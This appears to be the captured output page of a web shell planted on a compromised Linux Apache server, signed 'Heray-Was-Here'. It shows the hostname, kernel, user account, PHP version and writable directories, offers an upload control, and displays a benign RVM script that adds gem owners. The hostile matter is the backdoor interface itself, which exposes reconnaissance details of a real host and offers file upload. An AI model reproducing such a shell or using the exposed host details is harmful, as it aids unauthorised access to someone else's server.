Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/thread-self/root/usr/local/rvm/src/rvm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/usr/local/rvm/src/rvm/gem-owners.sh
REPOS=(
  bundler-unload
  executable-hooks
  gem-empty
  gem-wrappers
  rubygems-bundler
  rvm
  rvm-capistrano
  rvm-with
  rvm1-capistrano3
  rvm2
  rvm2-shell
  rvm2-ui
  tf
  pluginator
)

\typeset repo owner
\typeset -a params
params=()

if
  [[ $# -gt 0 ]]
then
  for owner in "$@"
  do
    params+=( --add "$owner" )
  done
fi

for repo in "${REPOS[@]}"
do
  gem owner "$repo" "${params[@]}"
done

Hry